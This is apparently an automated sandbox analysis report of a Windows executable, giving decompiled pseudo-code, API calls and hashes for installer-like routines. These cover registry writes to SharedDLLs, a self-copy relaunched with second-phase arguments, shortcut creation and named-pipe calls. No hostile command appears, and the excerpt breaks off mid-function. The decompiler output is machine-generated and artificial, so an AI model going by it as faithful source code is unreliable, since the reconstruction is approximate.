RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0045391B,?,00000000,004539DF), ref: 0045386B
RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,0045391B,?,00000000,004539DF), ref: 004539A7

Part of subcall function 0042E714: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004525D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E733

Strings

RegCreateKeyEx, xrefs: 004537DF
, xrefs: 004537CD
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453783
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004537B3

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseCreateFormatMessageQueryValue
String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2481121983-1280779767
Opcode ID: 38fb23749d6ee7ad0d4d753a4e20e3c078347cc6c05360d14dfaf317bbb5c638
Instruction ID: 0b89bf75a9c9687b20ed21eb038899f0cb25ce62a83679de71854117abc0a5a9
Opcode Fuzzy Hash: 38fb23749d6ee7ad0d4d753a4e20e3c078347cc6c05360d14dfaf317bbb5c638
Instruction Fuzzy Hash: 3F81FEB5A00209ABDB01DFD5C981BDEB7B9EF48345F10452AF901F7282D778AF058B69

Uniqueness

Uniqueness Score: -1.00%

Function 00494EE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141
fileCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00494EE0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				struct HWND__* _v12;
				void* _v16;
				char _v20;
				char _v24;
				struct HWND__* _v28;
				char _v32;
				char _v36;
				char _v40;
				CHAR* _t38;
				intOrPtr _t39;
				int _t41;
				struct HINSTANCE__* _t45;
				intOrPtr _t50;
				void* _t63;
				struct HWND__* _t71;
				intOrPtr _t75;
				intOrPtr _t94;
				intOrPtr _t96;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t98 = __esi;
				_t97 = __edi;
				_t82 = __ecx;
				_t81 = __ebx;
				_t100 = _t101;
				_t102 = _t101 + 0xffffffdc;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v20 = 0;
				_v40 = 0;
				_v8 = 0;
				_push(_t100);
				_push(0x4950b1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t102;
				E0042D918( &_v20, __ebx, __ecx, __edi, __esi);
				if(E00452C1C(_v20, _t81,  &_v8, _t97, _t98) == 0) {
					_push(_t100);
					_push( *[fs:eax]);
					 *[fs:eax] = _t102;
					E00452F6C(0, _t81, _v8, _t97, _t98);
					_pop(_t96);
					_t82 = 0x494f3d;
					 *[fs:eax] = _t96;
				}
				_t38 = E00403738(_v8);
				_t39 =  *0x49b450; // 0x0
				_t41 = CopyFileA(E00403738(_t39), _t38, 0);
				_t105 = _t41;
				if(_t41 == 0) {
					_t75 =  *0x49adac; // 0x227dc40
					E00494588(_t75, _t81, _t82, _t97, _t98, _t105);
				}
				SetFileAttributesA(E00403738(_v8), 0x80);
				_t45 =  *0x49a014; // 0x400000
				_v12 = CreateWindowExA(0, "STATIC", 0x4950c0, 0, 0, 0, 0, 0, 0, 0, _t45, 0);
				 *0x49b47c = SetWindowLongA(_v12, 0xfffffffc, E00494738);
				_push(_t100);
				_push(0x495084);
				_push( *[fs:eax]);
				 *[fs:eax] = _t102;
				_t50 =  *0x49a628; // 0x2262410
				SetWindowPos( *(_t50 + 0x20), 0, 0, 0, 0, 0, 0x97);
				E0042D3F0(0, _t81,  &_v40, _t97, _t98);
				_v36 = _v40;
				_v32 = 0xb;
				_v28 = _v12;
				_v24 = 0;
				E004078D4("/SECONDPHASE=\"%s\" /FIRSTPHASEWND=$%x ", 1,  &_v36,  &_v20);
				_push( &_v20);
				E0042D2D0( &_v40, _t81, 1, _t97, _t98, 0);
				_pop(_t63);
				E0040357C(_t63, _v40);
				_v16 = E00494630(_v8, _t81, _v20, _t97, _t98, 0);
				do {
				} while (E004946FC() == 0 && MsgWaitForMultipleObjects(1,  &_v16, 0, 0xffffffff, 0xff) == 1);
				CloseHandle(_v16);
				_pop(_t94);
				 *[fs:eax] = _t94;
				_push(E0049508B);
				_t71 = _v12;
				_push(_t71);
				L00405E44();
				return _t71;
			}

0x00494ee0
0x00494ee0
0x00494ee0
0x00494ee0
0x00494ee1
0x00494ee3
0x00494ee6
0x00494ee7
0x00494ee8
0x00494eeb
0x00494eee
0x00494ef1
0x00494ef6
0x00494ef7
0x00494efc
0x00494eff
0x00494f05
0x00494f17
0x00494f1b
0x00494f21
0x00494f24
0x00494f2e
0x00494f35
0x00494f37
0x00494f38
0x00494f38
0x00494f4c
0x00494f52
0x00494f5d
0x00494f62
0x00494f64
0x00494f66
0x00494f6b
0x00494f6b
0x00494f7e
0x00494f85
0x00494faa
0x00494fbd
0x00494fc4
0x00494fc5
0x00494fca
0x00494fcd
0x00494fdf
0x00494fe8
0x00494ff6
0x00494ffe
0x00495001
0x00495008
0x0049500b
0x0049501c
0x00495024
0x00495028
0x00495030
0x00495031
0x00495041
0x00495044
0x00495049
0x00495068
0x0049506f
0x00495072
0x00495075
0x0049507a
0x0049507d
0x0049507e
0x00495083

APIs

Part of subcall function 00452C1C: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004950B1,\nI,?,00000000,00452D56), ref: 00452D0B
Part of subcall function 00452C1C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004950B1,\nI,?,00000000,00452D56), ref: 00452D1B

CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00494F5D
SetFileAttributesA.KERNEL32(00000000,00000080,00000000,004950B1), ref: 00494F7E
CreateWindowExA.USER32 ref: 00494FA5
SetWindowLongA.USER32 ref: 00494FB8
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495084,?,?,000000FC,00494738,00000000,STATIC,004950C0), ref: 00494FE8
MsgWaitForMultipleObjects.USER32 ref: 0049505C
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495084,?,?,000000FC,00494738,00000000), ref: 00495068

Part of subcall function 00452F6C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453053

740C9840.USER32(?,0049508B,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495084,?,?,000000FC,00494738,00000000,STATIC), ref: 0049507E

Strings

/SECONDPHASE="%s" /FIRSTPHASEWND=$%x , xrefs: 00495017
STATIC, xrefs: 00494F9E

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FileWindow$CloseCreateHandle$AttributesC9840CopyLongMultipleObjectsPrivateProfileStringWaitWrite
String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
API String ID: 683773084-2312673372
Opcode ID: 32d75eb12b2c21df5f6072c2099a2103d62719830f74bf4144f206d930da25b5
Instruction ID: be9799695a634fd16342a498ff1c2bceea11db58a4a937bc99d2ba33e8a5f773
Opcode Fuzzy Hash: 32d75eb12b2c21df5f6072c2099a2103d62719830f74bf4144f206d930da25b5
Instruction Fuzzy Hash: 41414271A00608AEDF01EBA5DC42F9E7BF8EB49714F614576F500FB291D6799E008B98

Uniqueness

Uniqueness Score: -1.00%

Function 0042EDE0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0042EDEC
GetModuleHandleA.KERNEL32(user32.dll), ref: 0042EE00
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042EE0D
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042EE1A
GetWindowRect.USER32 ref: 0042EE66
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 0042EEA4

Strings

user32.dll, xrefs: 0042EDFB
GetMonitorInfoA, xrefs: 0042EE14
(, xrefs: 0042EE45
MonitorFromWindow, xrefs: 0042EE07

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$AddressProc$ActiveHandleModuleRect
String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
API String ID: 2610873146-3407710046
Opcode ID: 11c5073dfdaa9037ed7ee8ee0033142e90f41fafdebd04e55e7902a8f04116da
Instruction ID: 81b88a7ab1ceae721b8aeb91463505c39b24ef06fee82e2a457cdd2782b0c03c
Opcode Fuzzy Hash: 11c5073dfdaa9037ed7ee8ee0033142e90f41fafdebd04e55e7902a8f04116da
Instruction Fuzzy Hash: E021C272301724AFD310D669DC81F3B3298EB84714F0A452EF944DB381DA78DC008A99

Uniqueness

Uniqueness Score: -1.00%

Function 00461D94 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00461DA0
GetModuleHandleA.KERNEL32(user32.dll), ref: 00461DB4
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00461DC1
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00461DCE
GetWindowRect.USER32 ref: 00461E1A
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00461E58

Strings

(, xrefs: 00461DF9
MonitorFromWindow, xrefs: 00461DBB
user32.dll, xrefs: 00461DAF
GetMonitorInfoA, xrefs: 00461DC8

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$AddressProc$ActiveHandleModuleRect
String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
API String ID: 2610873146-3407710046
Opcode ID: e92b9d5c7068c4ad65174a98f8279c3bd8cee61227202439de3f3f07641de1ce
Instruction ID: ac50aa85d20f27128dd8c3642a774edf16143193052780fb3ca3c770c826b634
Opcode Fuzzy Hash: e92b9d5c7068c4ad65174a98f8279c3bd8cee61227202439de3f3f07641de1ce
Instruction Fuzzy Hash: 912195757017046BD3109664CC41F3B3795DB84B14F0C452AFD44DB392E67EDC008A9A

Uniqueness

Uniqueness Score: -1.00%

Function 004556CC Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 243
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E004556CC(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				char _v44;
				char _v48;
				char* _t72;
				intOrPtr* _t78;
				intOrPtr* _t83;
				intOrPtr* _t87;
				void* _t89;
				intOrPtr* _t92;
				intOrPtr* _t98;
				intOrPtr* _t104;
				intOrPtr* _t107;
				intOrPtr* _t110;
				intOrPtr* _t124;
				void* _t126;
				intOrPtr* _t130;
				void* _t132;
				intOrPtr* _t133;
				void* _t135;
				intOrPtr _t137;
				intOrPtr* _t145;
				intOrPtr* _t149;
				intOrPtr* _t154;
				char* _t159;
				void* _t164;
				intOrPtr _t165;
				intOrPtr _t176;
				intOrPtr _t181;
				intOrPtr _t188;
				intOrPtr _t190;
				void* _t192;
				void* _t193;
				intOrPtr _t194;

				_t192 = _t193;
				_t194 = _t193 + 0xffffffd4;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v48 = 0;
				_v12 = __ecx;
				_t164 = __edx;
				_v8 = __eax;
				_t188 = _a16;
				_t190 = _a28;
				_push(_t192);
				_push(0x45598e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				if(_a12 == 0) {
					_t72 = 0x80004005;
				} else {
					_t72 =  &_v16;
					_push(_t72);
					_push(0x498774);
					_push(1);
					_push(0);
					_push(0x498a68);
					L0042CBE8();
				}
				if(_t72 != 0) {
					_a12 = 0;
					_t159 =  &_v16;
					_push(_t159);
					_push(0x498774);
					_push(1);
					_push(0);
					_push(0x498764);
					L0042CBE8();
					_t197 = _t159;
					if(_t159 != 0) {
						E00452810("CoCreateInstance", _t164, _t159, _t188, _t190, _t197);
					}
				}
				_v24 = 0;
				_v20 = 0;
				_v28 = 0;
				 *[fs:edx] = _t194;
				_t78 = _v16;
				 *((intOrPtr*)( *_t78 + 0x50))(_t78, E00403738(_v12),  *[fs:edx], 0x455971, _t192);
				_t83 = _v16;
				 *((intOrPtr*)( *_t83 + 0x2c))(_t83, E00403738(_a36));
				if(_a12 == 0) {
					E004554F0(_v16, _t164, _a32, _t188, _t190);
				}
				if(_t190 != 0) {
					_t154 = _v16;
					 *((intOrPtr*)( *_t154 + 0x44))(_t154, E00403738(_t190), _a24);
				}
				_t87 = _v16;
				_t89 =  *((intOrPtr*)( *_t87 + 0x3c))(_t87, _a20);
				if(_t164 != 0) {
					_t149 = _v16;
					_t89 =  *((intOrPtr*)( *_t149 + 0x1c))(_t149, E00403738(_t164));
				}
				if(_t188 != 0) {
					_t145 = _v16;
					_t89 =  *((intOrPtr*)( *_t145 + 0x34))(_t145, _t188);
				}
				if(E004554E0(_t89) == 0 || _a8 == 0) {
					_t92 = _v16;
					__eflags =  *((intOrPtr*)( *_t92))(_t92, 0x498744,  &_v24);
					if(__eflags != 0) {
						_t94 = E00452810("IShellLink::QueryInterface", _t164, _t94, _t188, _t190, __eflags);
					}
					__eflags = _a12;
					if(_a12 == 0) {
						L30:
						_v28 = E00403CA4(_v8);
					} else {
						__eflags = E004554C0(_t94);
						if(__eflags == 0) {
							goto L30;
						} else {
							E0042C49C(_v8, _t164,  &_v48, 0, _t188, _t190, __eflags);
							_v28 = E00403CA4(_v48);
						}
					}
					__eflags = _v28;
					if(_v28 == 0) {
						E00408BE0();
					}
					_t98 = _v24;
					__eflags =  *((intOrPtr*)( *_t98 + 0x18))(_t98, _v28, 1);
					if(__eflags != 0) {
						E00452810("IPersistFile::Save", _t164, _t100, _t188, _t190, __eflags);
					}
					E004555E4(_v24, _t164, _a4, _v8, _t188, _t190, __eflags);
					_pop(_t176);
					 *[fs:eax] = _t176;
					_push(0x455978);
					__eflags = _v28;
					if(_v28 != 0) {
						_push(_v28);
						L0042CC00();
					}
					__eflags = _v20;
					if(_v20 != 0) {
						_t110 = _v20;
						 *((intOrPtr*)( *_t110 + 8))(_t110);
					}
					__eflags = _v24;
					if(_v24 != 0) {
						_t107 = _v24;
						 *((intOrPtr*)( *_t107 + 8))(_t107);
					}
					_t104 = _v16;
					return  *((intOrPtr*)( *_t104 + 8))(_t104);
				} else {
					_t124 = _v16;
					_t126 =  *((intOrPtr*)( *_t124))(_t124, 0x498a58,  &_v20);
					_t204 = _t126;
					if(_t126 != 0) {
						E00452810("IPropertyStore::SetValue", _t164, _t126, _t188, _t190, _t204);
					}
					_v44 = 8;
					_t165 = E00403CA4(_a8);
					_v36 = _t165;
					if(_t165 == 0) {
						E00408BE0();
					}
					 *[fs:edx] = _t194;
					_t130 = _v20;
					_t132 =  *((intOrPtr*)( *_t130 + 0x18))(_t130, 0x498a78,  &_v44,  *[fs:edx], 0x455899, _t192);
					_t206 = _t132;
					if(_t132 != 0) {
						E00452810("IPropertyStore::SetValue", _t165, _t132, _t188, _t190, _t206);
					}
					_t133 = _v20;
					_t135 =  *((intOrPtr*)( *_t133 + 0x1c))(_t133);
					_t207 = _t135;
					if(_t135 != 0) {
						E00452810("IPropertyStore::Commit", _t165, _t135, _t188, _t190, _t207);
					}
					_pop(_t181);
					 *[fs:eax] = _t181;
					_push(0x4558a0);
					_t137 = _v36;
					_push(_t137);
					L0042CC00();
					return _t137;
				}
			}

0x004556cd
0x004556cf
0x004556d2
0x004556d3
0x004556d4
0x004556d7
0x004556da
0x004556dd
0x004556df
0x004556e2
0x004556e5
0x004556ea
0x004556eb
0x004556f0
0x004556f3
0x004556fa
0x00455715
0x004556fc
0x004556fc
0x004556ff
0x00455700
0x00455705
0x00455707
0x00455709
0x0045570e
0x0045570e
0x0045571c
0x0045571e
0x00455722
0x00455725
0x00455726
0x0045572b
0x0045572d
0x0045572f
0x00455734
0x00455739
0x0045573b
0x00455744
0x00455744
0x0045573b
0x0045574b
0x00455750
0x00455755
0x00455763
0x0045576f
0x00455775
0x00455781
0x00455787
0x0045578e
0x00455796
0x00455796
0x0045579d
0x004557ab
0x004557b1
0x004557b1
0x004557b8
0x004557be
0x004557c3
0x004557cd
0x004557d3
0x004557d3
0x004557d9
0x004557dc
0x004557e2
0x004557e2
0x004557ec
0x004558a9
0x004558b1
0x004558b3
0x004558bc
0x004558bc
0x004558c1
0x004558c5
0x004558ea
0x004558f2
0x004558c7
0x004558cc
0x004558ce
0x00000000
0x004558d0
0x004558d8
0x004558e5
0x004558e5
0x004558ce
0x004558f5
0x004558f9
0x004558fb
0x004558fb
0x00455906
0x0045590f
0x00455911
0x0045591a
0x0045591a
0x00455928
0x0045592f
0x00455932
0x00455935
0x0045593a
0x0045593e
0x00455943
0x00455944
0x00455944
0x00455949
0x0045594d
0x0045594f
0x00455955
0x00455955
0x00455958
0x0045595c
0x0045595e
0x00455964
0x00455964
0x00455967
0x00455970
0x004557fc
0x00455805
0x0045580b
0x0045580d
0x0045580f
0x00455818
0x00455818
0x0045581d
0x0045582b
0x0045582d
0x00455832
0x00455834
0x00455834
0x00455844
0x00455850
0x00455856
0x00455859
0x0045585b
0x00455864
0x00455864
0x00455869
0x0045586f
0x00455872
0x00455874
0x0045587d
0x0045587d
0x00455884
0x00455887
0x0045588a
0x0045588f
0x00455892
0x00455893
0x00455898
0x00455898

APIs

7677B690.OLE32(00498A68,00000000,00000001,00498774,?,00000000,0045598E), ref: 0045570E
7677B690.OLE32(00498764,00000000,00000001,00498774,?,00000000,0045598E), ref: 00455734
SysFreeString.OLEAUT32(?), ref: 00455893

Strings

IShellLink::QueryInterface, xrefs: 004558B7
IPersistFile::Save, xrefs: 00455915
CoCreateInstance, xrefs: 0045573F
IPropertyStore::SetValue, xrefs: 00455813, 0045585F
IPropertyStore::Commit, xrefs: 00455878

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: 7677B690$FreeString
String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue$IShellLink::QueryInterface
API String ID: 2057671328-2052886881
Opcode ID: 65e6feab3334f41c747474a8d0c578ebdac36064f9a50202e3e6e8fe36fe3ed3
Instruction ID: 80119b9caab7ce5f12158988fbcf678bfb4129473555bd74f63c4a2737be3c75
Opcode Fuzzy Hash: 65e6feab3334f41c747474a8d0c578ebdac36064f9a50202e3e6e8fe36fe3ed3
Instruction Fuzzy Hash: 23915270A00604EFDB40EFA9C895BAE77F8AF09315F14406AF904E7252DB78DD08CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00457FB8 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127
pipeCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00457FB8(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, char _a4) {
				intOrPtr _v8;
				long _v12;
				void* _v16;
				struct _OVERLAPPED _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				long _t85;
				intOrPtr _t97;
				intOrPtr _t99;
				void* _t104;
				void* _t105;
				intOrPtr _t106;

				_t104 = _t105;
				_t106 = _t105 + 0xffffffd8;
				_v40 = 0;
				_v44 = 0;
				_v8 = __eax;
				_push(_t104);
				_push(0x4581fa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t106;
				 *(_v8 + 0x14) =  *(_v8 + 0x14) + 1;
				 *(_v8 + 0x20) =  *(_v8 + 0x14);
				 *((intOrPtr*)(_v8 + 0x24)) = __edx;
				 *((intOrPtr*)(_v8 + 0x28)) = __ecx;
				_t85 = 0xc + __ecx;
				_push(_t104);
				_push(0x458197);
				_push( *[fs:edx]);
				 *[fs:edx] = _t106;
				_v16 = CreateEventA(0, 1, 0, 0);
				if(_v16 == 0) {
					E004527FC("CreateEvent");
				}
				_push(_t104);
				_push(0x45812c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t106;
				E00402934( &_v36, 0x14);
				_v36.hEvent = _v16;
				if(TransactNamedPipe( *(_v8 + 0xc), _v8 + 0x20, _t85, _v8 + 0x4034, 0x14,  &_v12,  &_v36) != 0) {
					_pop(_t97);
					 *[fs:eax] = _t97;
					_push(E00458133);
					return CloseHandle(_v16);
				} else {
					if(GetLastError() != 0x3e5) {
						E004527FC("TransactNamedPipe");
					}
					_push(_t104);
					_push(0x4580fe);
					_push( *[fs:edx]);
					 *[fs:edx] = _t106;
					if(_a4 != 0 &&  *((short*)(_v8 + 0x1a)) != 0) {
						do {
							 *((intOrPtr*)(_v8 + 0x18))();
						} while (MsgWaitForMultipleObjects(1,  &_v16, 0, 0xffffffff, 0xff) == 1);
					}
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E00458105);
					GetOverlappedResult( *(_v8 + 0xc),  &_v36,  &_v12, 1);
					return GetLastError();
				}
			}

0x00457fb9
0x00457fbb
0x00457fc3
0x00457fc6
0x00457fc9
0x00457fce
0x00457fcf
0x00457fd4
0x00457fd7
0x00457fdd
0x00457fe9
0x00457fef
0x00457ff5
0x00457ffd
0x00458001
0x00458002
0x00458007
0x0045800a
0x0045801a
0x00458021
0x00458028
0x00458028
0x0045802f
0x00458030
0x00458035
0x00458038
0x00458045
0x0045804d
0x00458079
0x00458117
0x0045811a
0x0045811d
0x0045812b
0x0045807f
0x00458089
0x00458090
0x00458090
0x00458097
0x00458098
0x0045809d
0x004580a0
0x004580a7
0x004580b3
0x004580b9
0x004580d0
0x004580b3
0x004580d5
0x004580d8
0x004580db
0x004580f1
0x004580fd
0x004580fd

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458197,?,00000000,004581FA,?,?,0226386C,00000000), ref: 00458015
TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,0226386C,?,00000000,0045812C,?,00000000,00000001,00000000,00000000,00000000,00458197), ref: 00458072
GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,0226386C,?,00000000,0045812C,?,00000000,00000001,00000000,00000000,00000000,00458197), ref: 0045807F
MsgWaitForMultipleObjects.USER32 ref: 004580CB
GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458105,?,-00000020,0000000C,-00004034,00000014,0226386C,?,00000000,0045812C,?,00000000), ref: 004580F1
GetLastError.KERNEL32(?,?,00000000,00000001,00458105,?,-00000020,0000000C,-00004034,00000014,0226386C,?,00000000,0045812C,?,00000000), ref: 004580F8

Part of subcall function 004527FC: GetLastError.KERNEL32(00000000,0045326D,00000005,00000000,004532A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,004966A1,00000000), ref: 004527FF

Strings

CreateEvent, xrefs: 00458023
TransactNamedPipe, xrefs: 0045808B

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
String ID: CreateEvent$TransactNamedPipe
API String ID: 2182916169-3012584893
Opcode ID: 80cf0cd36e542965d12430940a80f4859f37586d0a0e4c33ba5d02a8b2aa511b
Instruction ID: a6a517d63fd32511c22b817f408bf5895b74d3bbd499f81ebc87de90a3a3405e
Opcode Fuzzy Hash: 80cf0cd36e542965d12430940a80f4859f37586d0a0e4c33ba5d02a8b2aa511b
Instruction Fuzzy Hash: B6418371A00608AFDB15DF95C981F9EB7F9FB08710F1140AAF904F7292DA789E44CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00455B64 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00455B64(void* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr _t28;
				intOrPtr* _t30;
				void* _t32;
				intOrPtr _t33;
				void* _t34;
				intOrPtr* _t37;
				intOrPtr* _t50;
				intOrPtr _t62;
				intOrPtr* _t67;
				void* _t69;
				void* _t71;
				void* _t72;
				intOrPtr _t73;

				_t71 = _t72;
				_t73 = _t72 + 0xfffffff0;
				_v20 = 0;
				_t69 = __eax;
				_push(_t71);
				_push(0x455cc9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t73;
				_t67 = GetProcAddress(GetModuleHandleA("OLEAUT32.DLL"), "UnRegisterTypeLib");
				_t50 = _t67;
				if(_t67 == 0) {
					E004527FC("GetProcAddress");
				}
				E0042C7A8(_t69,  &_v20);
				_v8 = E00403CA4(_v20);
				if(_v8 == 0) {
					E00408BE0();
				}
				_push(_t71);
				_push(0x455cac);
				_push( *[fs:edx]);
				 *[fs:edx] = _t73;
				_push( &_v12);
				_t28 = _v8;
				_push(_t28);
				L0042CC08();
				_t76 = _t28;
				if(_t28 != 0) {
					E00452810("LoadTypeLib", _t50, _t28, _t67, _t69, _t76);
				}
				 *[fs:edx] = _t73;
				_t30 = _v12;
				_t32 =  *((intOrPtr*)( *_t30 + 0x1c))(_t30,  &_v16,  *[fs:edx], 0x455c8e, _t71);
				_t77 = _t32;
				if(_t32 != 0) {
					E00452810("ITypeLib::GetLibAttr", _t50, _t32, _t67, _t69, _t77);
				}
				 *[fs:edx] = _t73;
				_t33 = _v16;
